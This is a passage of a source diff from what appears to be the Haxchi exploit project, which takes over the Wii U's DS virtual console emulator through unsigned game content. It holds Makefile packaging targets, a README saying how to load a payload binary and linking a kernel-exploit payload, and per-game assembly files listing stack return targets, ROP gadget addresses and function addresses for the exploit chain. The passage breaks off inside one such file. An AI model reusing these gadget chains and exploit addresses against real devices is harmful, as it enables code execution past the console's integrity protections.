+	$(ZIP) -JXjq9 $(TARGET_PATH)/kirbymassattack.zip $(BUILD)/kirbymassattack.nds
+
+mariokartds.zip:
+	$(ZIP) -JXjq9 $(TARGET_PATH)/mariokartds.zip $(BUILD)/mariokartds.nds
+	$(ZIP) -JXjq9 $(TARGET_PATH)/newsmb.zip $(BUILD)/newsmb.nds
+
+masterofdisguise.zip:
+	$(ZIP) -JXjq9 $(TARGET_PATH)/masterofdisguise.zip $(BUILD)/masterofdisguise.nds
+
+newsmb_eur.zip:
+	$(ZIP) -JXjq9 $(TARGET_PATH)/newsmb_eur.zip $(BUILD)/newsmb_eur.nds
+
+pokemonranger.zip:
+	$(ZIP) -JXjq9 $(TARGET_PATH)/pokemonranger.zip $(BUILD)/pokemonranger.nds
+
+partnersintime.zip:
+	$(ZIP) -JXjq9 $(TARGET_PATH)/partnersintime.zip $(BUILD)/partnersintime.nds
+
+sfcommand.zip:
+	$(ZIP) -JXjq9 $(TARGET_PATH)/sfcommand.zip $(BUILD)/sfcommand.nds
+
+sm64ds.zip:
+	$(ZIP) -JXjq9 $(TARGET_PATH)/sm64ds.zip $(BUILD)/sm64ds.nds
+	$(ZIP) -JXjq9 $(TARGET_PATH)/kirbycanvascurse.zip $(BUILD)/kirbycanvascurse.nds
+
+yoshids.zip:
+	$(ZIP) -JXjq9 $(TARGET_PATH)/yoshids.zip $(BUILD)/yoshids.nds
+	$(ZIP) -JXjq9 $(TARGET_PATH)/wwtouched.zip $(BUILD)/wwtouched.nds
+	$(ZIP) -JXjq9 $(TARGET_PATH)/bigbrainacademy.zip $(BUILD)/bigbrainacademy.nds
+
+zeldaph.zip:
+	$(ZIP) -JXjq9 $(TARGET_PATH)/zeldaph.zip $(BUILD)/zeldaph.nds
+
+zeldast.zip:
+	$(ZIP) -JXjq9 $(TARGET_PATH)/zeldast.zip $(BUILD)/zeldast.nds
+	$(ZIP) -JXjq9 $(TARGET_PATH)/explorersofsky.zip $(BUILD)/explorersofsky.nds
+	$(ZIP) -JXjq9 $(TARGET_PATH)/shadowsofalmia.zip $(BUILD)/shadowsofalmia.nds
+
+clean:
+	@rm -fr *.nds $(TARGET_PATH)/*.zip  $(DATA) $(BUILD) defines.s
+	@echo "all cleaned up !"

payload_generator/README.md

@@ -0,0 +1,27 @@
+# Haxchi-Exploit
+This is the continuation of Haxchi from FIX94 (initial PoC by smea).  
+
+```
+haxchi is an exploit for the Nintendo DS virtual console emulator on Wii U (hachihachi). 
+it is possible due to "contenthax", a vulnerability in the wii u's title integrity design: 
+only code and critical descriptors are signed, with all other contents left at the mercy of attackers.
+```
+
+# Usage
+Put a payload `code550.bin` in the root of this project.  
+This payload should be statically linked to 0x18000000, and is called inside a thread.  
+Make sure to exit this thread via `OSExitThread(0);`, afterwards the rop switches automatically to the Mii Maker.  
+
+An example payload which perform the kernel exploit can be found [here](https://github.com/wiiu-env/haxchi_payload).
+
+# Notes
+
+Currently this ONLY executes a given `code550.bin`, nothing usable for the end user. Only one game, no CFW, no coldboothax, nothing.
+
+## Dependencies
+
+[armips](https://github.com/Kingcom/armips/releases) and zip in your PATH variable.
+
+## credit
+
+smea, plutoo, yellows8, naehrwert, derrek, FIX94, dimok and orboditilt.

payload_generator/defines/animalcrossing_defs.s

@@ -0,0 +1,39 @@
+
+; game stack return address
+HAX_TARGET_ADDRESS equ (0x1079B6A4-0xC8)
+; application memory pointer
+HACHI_APPLICATION_PTR equ (0x10C91938)
+; arm9 rom location address
+ARM9_ROM_LOCATION equ (0x16440F00)
+
+; constants for position calcs
+RPX_OFFSET equ (0x01800000)
+ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
+
+; rop-gadgets part 1 (used for all sorts of different things)
+LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x0200369C)
+BCTRL equ (RPX_OFFSET + 0x020041D8)
+MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A9DC4)
+LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A999C)
+LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02001AF8)
+MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x0217F924)
+LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x0227F310)
+
+; rop-gadgets part 2 (only used to set up core 0 thread stack)
+LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018AB0)
+MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020B5204)
+LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F624)
+LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x020862CC)
+LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205A454)
+LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018B38)
+LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x0214FA58)
+MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020244B4)
+
+; functions used from game
+NERD_CREATETHREAD equ (RPX_OFFSET + 0x022290AC)
+NERD_STARTTHREAD equ (RPX_OFFSET + 0x022294C8)
+NERD_JOINTHREAD equ (RPX_OFFSET + 0x02228F58)
+HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006E2C)
+NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FF0C)
+CORE_SHUTDOWN equ (RPX_OFFSET + 0x02228B9C)
+_START_EXIT equ (RPX_OFFSET + 0x020265DC)

payload_generator/defines/dkjclimber_defs.s

@@ -0,0 +1,39 @@
+
+; game stack return address
+HAX_TARGET_ADDRESS equ (0x107969A4-0xB8)
+; application memory pointer
+HACHI_APPLICATION_PTR equ (0x10C8C938)
+; arm9 rom location address
+ARM9_ROM_LOCATION equ (0x1643F200)
+
+; constants for position calcs
+RPX_OFFSET equ (0x01800000)
+ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
+
+; rop-gadgets part 1 (used for all sorts of different things)
+LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x022070C4)
+BCTRL equ (RPX_OFFSET + 0x02206FFC)
+MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3650)
+LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A327C)
+LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020ACA78)
+MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x021791A8)
+LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277B84)
+
+; rop-gadgets part 2 (only used to set up core 0 thread stack)
+LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018910)
+MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AEA90)
+LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F4B0)
+LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02082F58)
+LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x02057A10)
+LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018998)
+LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x021492E4)
+MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020240F4)
+
+; functions used from game
+NERD_CREATETHREAD equ (RPX_OFFSET + 0x02221A28)
+NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221E44)
+NERD_JOINTHREAD equ (RPX_OFFSET + 0x022218D4)
+HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CD0)
+NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FB24)
+CORE_SHUTDOWN equ (RPX_OFFSET + 0x02220D8C)
+_START_EXIT equ (RPX_OFFSET + 0x02026944)

payload_generator/defines/guardiansigns_defs.s

@@ -0,0 +1,39 @@
+
+; game stack return address
+HAX_TARGET_ADDRESS equ (0x1079C564-0xC8)
+; application memory pointer
+HACHI_APPLICATION_PTR equ (0x10C92938)
+; arm9 rom location address
+ARM9_ROM_LOCATION equ (0x16441D00)
+
+; constants for position calcs
+RPX_OFFSET equ (0x01800000)
+ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
+
+; rop-gadgets part 1 (used for all sorts of different things)
+LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x0200369C)
+BCTRL equ (RPX_OFFSET + 0x020041D8)
+MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020ABF88)
+LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020ABB60)
+LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02001AF8)
+MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02181AC0)
+LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02281624)
+
+; rop-gadgets part 2 (only used to set up core 0 thread stack)
+LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018A88)
+MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020B73C8)
+LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F610)
+LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x020882E0)
+LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205B0C8)
+LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018B10)
+LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x02151BF4)
+MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0202441C)
+
+; functions used from game
+NERD_CREATETHREAD equ (RPX_OFFSET + 0x0222B2FC)
+NERD_STARTTHREAD equ (RPX_OFFSET + 0x0222B718)
+NERD_JOINTHREAD equ (RPX_OFFSET + 0x0222B1A8)
+HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006E2C)
+NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FE74)
+CORE_SHUTDOWN equ (RPX_OFFSET + 0x0222ADEC)
+_START_EXIT equ (RPX_OFFSET + 0x02026544)

payload_generator/defines/kirby_defs.s

@@ -0,0 +1,39 @@
+
+; game stack return address
+HAX_TARGET_ADDRESS equ (0x10796964-0xB8)
+; application memory pointer
+HACHI_APPLICATION_PTR equ (0x10C8C938)
+; arm9 rom location address
+ARM9_ROM_LOCATION equ (0x1643F200)
+
+; constants for position calcs
+RPX_OFFSET equ (0x01800000)
+ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
+
+; rop-gadgets part 1 (used for all sorts of different things)
+LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02207084)
+BCTRL equ (RPX_OFFSET + 0x02206FBC)
+MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3610)
+LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A323C)
+LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020ACA38)
+MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02179168)
+LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277B44)
+
+; rop-gadgets part 2 (only used to set up core 0 thread stack)
+LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018908)
+MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AEA50)
+LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F4A8)
+LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02082DC0)
+LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205788C)
+LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018990)
+LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x021492A4)
+MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020240EC)
+
+; functions used from game
+NERD_CREATETHREAD equ (RPX_OFFSET + 0x022219E8)
+NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221E04)
+NERD_JOINTHREAD equ (RPX_OFFSET + 0x02221894)
+HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CC8)
+NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FB1C)
+CORE_SHUTDOWN equ (RPX_OFFSET + 0x02220D4C)
+_START_EXIT equ (RPX_OFFSET + 0x0202693C)

payload_generator/defines/kirbymassattack_defs.s

@@ -0,0 +1,39 @@
+
+; game stack return address
+HAX_TARGET_ADDRESS equ (0x1079A3E4-0xC0)
+; application memory pointer
+HACHI_APPLICATION_PTR equ (0x10C90938)
+; arm9 rom location address
+ARM9_ROM_LOCATION equ (0x16444500)
+
+; constants for position calcs
+RPX_OFFSET equ (0x01800000)
+ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
+
+; rop-gadgets part 1 (used for all sorts of different things)
+LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x0204AE04)
+BCTRL equ (RPX_OFFSET + 0x02003D2C)
+MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020AA490)
+LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020AA068)
+LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02001A8C)
+MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x0217FFE8)
+LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x0227F898)
+
+; rop-gadgets part 2 (only used to set up core 0 thread stack)
+LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020187E4)
+MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020B58D0)
+LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F358)
+LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x020883B0)
+LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205C700)
+LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x0201886C)
+LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x02150124)
+MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020241C8)
+
+; functions used from game
+NERD_CREATETHREAD equ (RPX_OFFSET + 0x022296A0)
+NERD_STARTTHREAD equ (RPX_OFFSET + 0x02229ABC)
+NERD_JOINTHREAD equ (RPX_OFFSET + 0x0222954C)
+HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006B60)
+NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FC30)
+CORE_SHUTDOWN equ (RPX_OFFSET + 0x02229190)
+_START_EXIT equ (RPX_OFFSET + 0x020262EC)

payload_generator/defines/mariokartds_defs.s

@@ -0,0 +1,39 @@
+
+; game stack return address
+HAX_TARGET_ADDRESS equ (0x1077870C-0xB0)
+; application memory pointer
+HACHI_APPLICATION_PTR equ (0x10A77038)
+; arm9 rom location address
+ARM9_ROM_LOCATION equ (0x16229400)
+
+; constants for position calcs
+RPX_OFFSET equ (0x01800000)
+ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
+
+; rop-gadgets part 1 (used for all sorts of different things)
+LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x022031F8)
+BCTRL equ (RPX_OFFSET + 0x02203130)
+MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A04C8)
+LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A00A0)
+LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02005AB8)
+MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02175AE8)
+LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x022740A8)
+
+; rop-gadgets part 2 (only used to set up core 0 thread stack)
+LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02017F88)
+MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AB88C)
+LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200EB28)
+LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x020809E4)
+LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x02054DCC)
+LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018010)
+LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x02145D64)
+MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02023700)
+
+; functions used from game
+NERD_CREATETHREAD equ (RPX_OFFSET + 0x0221E0B8)
+NERD_STARTTHREAD equ (RPX_OFFSET + 0x0221E4D4)
+NERD_JOINTHREAD equ (RPX_OFFSET + 0x0221DF64)
+HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006944)
+NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201F138)
+CORE_SHUTDOWN equ (RPX_OFFSET + 0x0221D434)
+_START_EXIT equ (RPX_OFFSET + 0x02025F48)

payload_generator/defines/masterofdisguise_defs.s

@@ -0,0 +1,39 @@
+
+; game stack return address
+HAX_TARGET_ADDRESS equ (0x1079B924-0xB8)
+; application memory pointer
+HACHI_APPLICATION_PTR equ (0x10C91938)
+; arm9 rom location address
+ARM9_ROM_LOCATION equ (0x16444200)
+
+; constants for position calcs
+RPX_OFFSET equ (0x01800000)
+ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
+
+; rop-gadgets part 1 (used for all sorts of different things)
+LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x020645EC)
+BCTRL equ (RPX_OFFSET + 0x02004158)
+MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3F34)
+LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A3B0C)
+LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0200106C)
+MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02179A8C)
+LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02278460)
+
+; rop-gadgets part 2 (only used to set up core 0 thread stack)
+LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018908)
+MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AF374)
+LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F4A8)
+LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x020836A8)
+LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x02057944)
+LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018990)
+LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x02149BC8)
+MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020240EC)
+
+; functions used from game
+NERD_CREATETHREAD equ (RPX_OFFSET + 0x02222304)
+NERD_STARTTHREAD equ (RPX_OFFSET + 0x02222720)
+NERD_JOINTHREAD equ (RPX_OFFSET + 0x022221B0)
+HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CC8)
+NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FB1C)
+CORE_SHUTDOWN equ (RPX_OFFSET + 0x02221670)
+_START_EXIT equ (RPX_OFFSET + 0x0202699C)

payload_generator/defines/newsmb_eur_defs.s

@@ -0,0 +1,39 @@
+
+; game stack return address
+HAX_TARGET_ADDRESS equ (0x1077860C-0xB0)
+; application memory pointer
+HACHI_APPLICATION_PTR equ (0x10A77038)
+; arm9 rom location address
+ARM9_ROM_LOCATION equ (0x16229800)
+
+; constants for position calcs
+RPX_OFFSET equ (0x01800000)
+ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
+
+; rop-gadgets part 1 (used for all sorts of different things)
+LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x022031F8)
+BCTRL equ (RPX_OFFSET + 0x02203130)
+MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A04C8)
+LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A00A0)
